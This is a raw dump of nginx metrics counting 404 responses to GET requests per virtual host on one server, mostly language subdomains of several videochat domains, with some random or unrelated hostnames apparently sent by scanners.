nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="91740527-lb.tcr2cx0u24o.app"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="9wrorcwwku.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="\\x5Clocalhost"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_atproto.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_bimi.videochat.mx"} 87 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_dmarc.videochat.mx"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_mta-sts.videochat.mx"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_tls.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="a87a9fc9-22f5-4827-aa21-6134a2f2ebb1.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="aaexebs.videochat.mx"} 588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="aapfusu.videochat.mx"} 379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="abbwdaz.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="account.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="acfqhxblqbkn.videochat.mx"} 132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="admin.videochat.mx"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.cafe"} 1814 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.date"} 2764 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.mx"} 9462 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.show"} 584 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.tv.br"} 2948 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.world"} 4077 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="agdbqpt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="aglxlmi.videochat.mx"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="agobhsu.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="aivwnaz.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ajjsesv.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.cafe"} 3414 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.date"} 790 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.mx"} 6585 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.show"} 472 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.tv.br"} 2328 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.world"} 5562 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.cafe"} 2538 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.date"} 1053 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.mx"} 6986 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.show"} 444 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.tv.br"} 2939 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.world"} 5915 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="amadorseniorcenter-oit.videochat.mx"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ampwdba.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="anasyet.videochat.mx"} 96 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="aotconsultinghoro.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="api.caonimavip.xyz"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="api.cliproxy.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="api.ipify.org"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="api.videochat.mx"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="apiv4.9hits.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="app.videochat.mx"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="appywko.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="apsgnfn.shop"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="aqqrvsco.videochat.mx"} 201 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.cafe"} 7475 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.date"} 2726 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.mx"} 35927 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.show"} 873 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.tv.br"} 16287 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.world"} 5920 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="asset.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="assets.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="atm.game"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="auth.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.cafe"} 2263 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.date"} 591 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.mx"} 8416 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.show"} 655 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.tv.br"} 2070 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.world"} 6908 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="azecuhi.videochat.mx"} 802 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.cafe"} 2308 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.date"} 887 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.mx"} 7781 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.show"} 648 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.tv.br"} 2011 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.world"} 6059 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="backend.videochat.mx"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="backup.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bahisliona.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bcfhjfa.videochat.mx"} 81 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.cafe"} 4377 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.date"} 1194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.mx"} 8236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.show"} 471 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.tv.br"} 3129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.world"} 5169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="beta.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bezhkht.videochat.mx"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.cafe"} 3045 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.date"} 4772 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.mx"} 7846 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.show"} 797 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.tv.br"} 2903 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.world"} 6613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="biydyro.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="blfxhsco.videochat.mx"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="blog.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.cafe"} 2145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.date"} 1923 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.mx"} 7064 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.show"} 656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.tv.br"} 3204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.world"} 6699 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bnomnfi.videochat.mx"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="brgffsco.videochat.mx"} 286 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.cafe"} 1869 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.date"} 2917 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.mx"} 6818 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.show"} 873 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.tv.br"} 2288 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.world"} 5318 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="budjjsu.videochat.mx"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="buvvieo.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bvjywmk.videochat.mx"} 286 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bwfzopl.videochat.mx"} 530 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.cafe"} 2209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.date"} 317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.mx"} 5444 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.show"} 522 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.tv.br"} 2247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.world"} 4798 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cambium.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="caosyta.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cdn.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.cafe"} 2015 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.date"} 2115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.mx"} 9460 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.show"} 515 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.tv.br"} 3438 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.world"} 4338 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cf.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chitseyfamilydenhttjessicalovesdeno.videochat.mx"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chk-68500.videochat.mx"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.cafe"} 2613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.date"} 359 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.mx"} 7293 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.show"} 365 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.tv.br"} 2169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.world"} 4940 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cidxzvu.shop"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cjmpsxh.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cjrzvmn.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ckdbbet.videochat.mx"} 380 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ckupris.videochat.mx"} 215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cliproxy.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cloijsk.videochat.mx"} 1975 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cpanel.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="crm.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.cafe"} 3479 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.date"} 4460 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.mx"} 6974 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.show"} 854 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.tv.br"} 3298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.world"} 5881 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="csbdigita72718ne.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.cafe"} 2479 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.date"} 1370 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.mx"} 8769 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.show"} 507 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.tv.br"} 2766 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.world"} 6326 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cytjruk.videochat.mx"} 494 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="czcjxgl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="czhdzka.videochat.mx"} 578 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="czlyukk.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="d483beb4-8cd8-4622-99df-d6910965ea9e.videochat.mx"} 183 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="d58nhnu7e7ghhg7jmok0.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="d58nhtm7e7ghhg7jmpeg.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.cafe"} 2499 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.date"} 4491 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.mx"} 6268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.show"} 483 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.tv.br"} 5044 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.world"} 4648 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dashboard.novada.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dashboard.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="database.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dbkrftg.videochat.mx"} 343 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 620 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.cafe"} 2634 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.date"} 598 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.mx"} 7868 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.show"} 540 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.tv.br"} 2471 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.world"} 4642 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="demo.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dev.videochat.mx"} 215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dkdhvjv.videochat.mx"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dniqnmt.videochat.mx"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="duajeaf.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dwpqqsi.videochat.mx"} 333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dyjwolv.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eaqvugu.videochat.mx"} 121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="edbgopap.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="edukhzh.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.cafe"} 2588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.date"} 4765 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.mx"} 6995 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.show"} 389 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.tv.br"} 5339 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.world"} 2421 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eeiodfa.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="egbdcbg.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.cafe"} 2236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.date"} 956 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.mx"} 10320 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.show"} 298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.tv.br"} 4197 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.world"} 4801 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="elastic.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.cafe"} 2603 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.date"} 387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.mx"} 10614 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.show"} 262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.tv.br"} 3165 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.world"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ensgapap.videochat.mx"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.cafe"} 3332 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.date"} 728 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.mx"} 9316 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.show"} 563 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.tv.br"} 1932 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.world"} 4155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eojoxne.videochat.mx"} 466 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="epyqbar.videochat.mx"} 127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eqpuiba.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="erqlemr.videochat.mx"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.cafe"} 2807 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.date"} 6334 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.show"} 968 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.tv.br"} 3438 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.world"} 5649 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="esifuyi.videochat.mx"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="esiityi.videochat.mx"} 180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.cafe"} 2268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.date"} 316 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.mx"} 7708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.show"} 862 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.tv.br"} 2883 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.world"} 2895 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.cafe"} 2507 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.date"} 1721 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.mx"} 8863 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.show"} 916 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.tv.br"} 2632 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.world"} 5617 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="example.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.cafe"} 2361 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.date"} 813 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.mx"} 12387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.show"} 209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.tv.br"} 16371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.world"} 8078 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fblhxlelxyfr.videochat.mx"} 361 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fceameo.videochat.mx"} 184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fcflfis.videochat.mx"} 497 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fcirqky.videochat.mx"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.cafe"} 2014 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.date"} 4632 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.mx"} 10669 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.show"} 3227 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.tv.br"} 4515 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.world"} 4818 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fjtlhmrj.videochat.mx"} 891 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="flfiomi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="forum.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="foxdqtl.videochat.mx"} 921 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fpaaipap.videochat.mx"} 415 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fpobbvpmfscy.videochat.mx"} 89 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.cafe"} 2952 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.date"} 656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.mx"} 8478 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.show"} 680 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.tv.br"} 3157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.world"} 4244 